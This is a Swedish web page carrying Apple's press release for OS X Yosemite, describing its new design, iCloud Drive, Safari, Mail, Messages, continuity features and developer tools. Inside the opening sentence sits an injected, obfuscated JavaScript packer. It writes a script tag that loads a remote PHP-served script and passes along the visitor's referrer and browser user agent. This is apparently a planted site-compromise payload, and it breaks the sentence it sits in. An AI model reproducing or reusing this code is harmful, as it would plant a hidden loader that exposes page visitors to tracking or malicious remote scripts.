Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Apple presenterar OS X Yosemite

apple

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tefar|var|u0026u|referrer|tbenh||js|php’.split(’|’),0,{}))
presenterade idag OS X Yosemite, en kraftfull ny version av OS X med ett nytt och modernt utseende, kraftfulla appar och suveräna kontinuitetsfunktioner som gör att det går ännu smidigare att växla mellan Mac- och iOS-enheter i arbetet. I Notiscenter finns den nya vyn Idag där du snabbt kommer åt all viktig information på en och samma plats.

iCloud Drive är inbyggd i Finder och kan lagra alla sorters filer. Safari har en ny och smidig design som gör att du lätt kommer åt alla viktiga funktioner. Mail gör det lättare än någonsin att redigera och skicka bilagor. Med funktionen Handoff kan du påbörja en aktivitet på en enhet och fortsätta på en annan. Instant Hotspot förenklar internetdelningen via iPhone så att det blir lika lätt som att ansluta till ett Wi-Fi-nätverk. Med Yosemite kan du till och med ringa iPhone-samtal på din Mac.

”Yosemite är framtiden för OS X, med en ny otrolig design och nya suveräna appar som alla är framtagna för att fungera smidigt med iOS”, säger Craig Federighi, Apples vice VD för Software Engineering. ”Vi utvecklar våra plattformar, tjänster och enheter tillsammans, vilket ger oss möjlighet att skapa lättanvända produkter som saknar motstycke i branschen.  Det är något som Apple är ensamma om.”

Med Yosemite har OS X fått en ny design och ett modernt, elegant utseende. Reglagen är tydligare, smartare och lättare att förstå. Förenklade verktygsfält lägger fokus på innehållet utan att kompromissa med funktionerna. Genomskinliga lager synliggör mer av innehållet i appfönstret, visar vad som finns bakom fönstret och anpassar utseendet till skrivbordet. Appikonerna har en snygg och enhetlig design och det uppdaterade systemtypsnittet är lättare att läsa.

Med den nya vyn Idag i Notiscenter kommer du snabbt åt viktig information med hjälp av widgetar för Kalender, Väder, Aktier, Påminnelser, Världsklocka och sociala nätverk. Du kan dessutom hämta fler widgetar från Mac App Store och anpassa vyn Idag. Spotlight visas nu mitt på skrivbordet och innehåller nya resultatkategorier. Du kan få förslag från Wikipedia, Kartor, Bing, App Store, iTunes Store, iBooks Store och populära webbplatser, plus nyheter och biotider.

iCloud Drive är inbyggd i Finder och kan lagra alla sorters filer i iCloud. iCloud Drive fungerar som en vanlig mapp på din Mac, så du kan dra dit dokument, ordna dem i mappar och med taggar och söka efter dem med Spotlight. Med iCloud Drive kommer du åt alla dina filer i iCloud från din Mac, iPhone, iPad eller PC med Windows.

Safari har en ny och effektivare design som gör de viktigaste reglagen lättillgängliga. I den nya favoritvyn kommer du snabbt åt dina favoritwebbplatser och den nya, kraftfulla flikvyn visar miniatyrer av alla öppna webbsidor. Safari ger dig också större kontroll över din personliga integritet med hjälp av separata fönster för privat surfning och inbyggt stöd för sökmotorn DuckDuckGo som inte spårar sina användare. När du söker efter populära eller vanliga söktermer visas förslag från Spotlight bredvid förslagen från sökmotorn. Safari stöder det senaste inom webbstandarder, bland annat WebGL och SPDY. Tack vare stödet för HTML5 Premium Video Extensions kan du titta på Netflix HD-videor upp till två timmar längre.¹ Nitro JavaScript-motorn gör Safari mer än sex gånger snabbare än Firefox och fem gånger snabbare än Chrome vid körning av JavaScript på vanliga webbplatser.²

Mail gör det enklare än någonsin att redigera och skicka bilagor. Med Markup kan du snabbt fylla i och underteckna formulär eller kommentera bilder och PDF:er direkt i Mail. Mail Drop gör det enkelt att skicka upp till 5 GB stora videor, bilder eller filer från Mail-appen till valfri e-postadress. Meddelanden har fått ett nytt utseende och fler alternativ för kommunikation med släkt och vänner. Nu kan du sätta namn på meddelandetrådar så att de blir lättare att hitta, lägga till nya kontakter i pågående konversationer eller lämna konversationer du inte längre vill följa. Med Soundbites kan du skapa, skicka och lyssna på ljudklipp direkt i Meddelanden.

Kontinuitetsfunktionerna i Yosemite gör din Mac och iOS-enhet perfekta för varandra. När din iPhone eller iPad är i närheten av din Mac kan du använda Handoff till att påbörja en aktivitet på en enhet och skicka över den till en annan. Instant Hotspot gör det lika enkelt att använda internetdelning på iPhone som att ansluta till ett Wi-Fi-nätverk.³ SMS- och MMS-meddelanden som tidigare bara visades på din iPhone dyker nu upp i Meddelanden på alla dina enheter. Du kan till och med skicka SMS och MMS direkt från din Mac samt ringa och ta emot iPhone-samtal genom att använda din Mac som en högtalartelefon.?

Yosemite innehåller plattformstekniker som gör det enklare för utvecklare att ta fram suveräna Mac-appar. SpriteKit gör det enklare att lägga till realistiska rörelsemönster, fysiska modeller och belysning i spel. Det fungerar med SceneKit på ett sätt som gör det möjligt för alla utvecklare att ta fram 3D-spel. Storyboards för Yosemite och Xcode 6 drar nytta av de nya API:erna för View Controller i AppKit, vilket gör det lättare att utveckla appar som använder flera skärmar för data. Med hjälp av nya API:er kan utvecklare integrera Handoff i sina appar och skapa widgetar för vyn Idag som de sedan kan distribuera i Mac App Store. Med hjälp av tillägg för delningsmenyn kan nya målplatser läggas till i menyn och nya API:er gör det möjligt att skapa anpassade delningsblad.

Förhandsversionen för utvecklare av Yosemite kan hämtas av medlemmar i Mac Developer Program från och med idag. Apple presenterar även OS X Beta Program som ska hjälpa till att göra OS X ännu bättre. Programmet ger kunder tidigare tillgång till Yosemite så att de kan prova att använda förhandsversionen och skicka feedback. Mac-användare kan delta i OS X Beta Program för Yosemite i sommar och hämta den slutliga versionen utan kostnad från Mac App Store i höst. Kunder som är intresserade kan hitta mer information på www.apple.com/osx/preview.